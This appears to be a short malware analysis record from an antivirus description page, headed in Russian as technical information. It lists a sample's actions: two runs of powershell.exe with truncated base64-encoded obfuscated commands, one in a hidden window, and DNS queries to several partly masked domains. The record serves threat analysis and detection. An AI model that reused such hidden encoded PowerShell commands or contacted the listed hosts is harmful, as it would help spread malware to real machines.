Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAFgAVQBRAEMAQgBRAFoAdwBEAD0AJwBWAGMAQQAxAFUAdwAxAFoAJwA7ACQAVQA0AFoAVQBrADQAQQBvADEANAB3AHcAQgAgAD...
- DNS ASK sh###ize.com
- DNS ASK ha###ro.online
- DNS ASK vo####elektshop.no
- DNS ASK 4c###sma.com
- DNS ASK to##.##cestore.co.kr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAFgAVQBRAEMAQgBRAFoAdwBEAD0AJwBWAGMAQQAxAFUAdwAxAFoAJwA7ACQAVQA0AFoAVQBrADQAQQBvADEANAB3AHcAQgAgAD...' (со скрытым окном)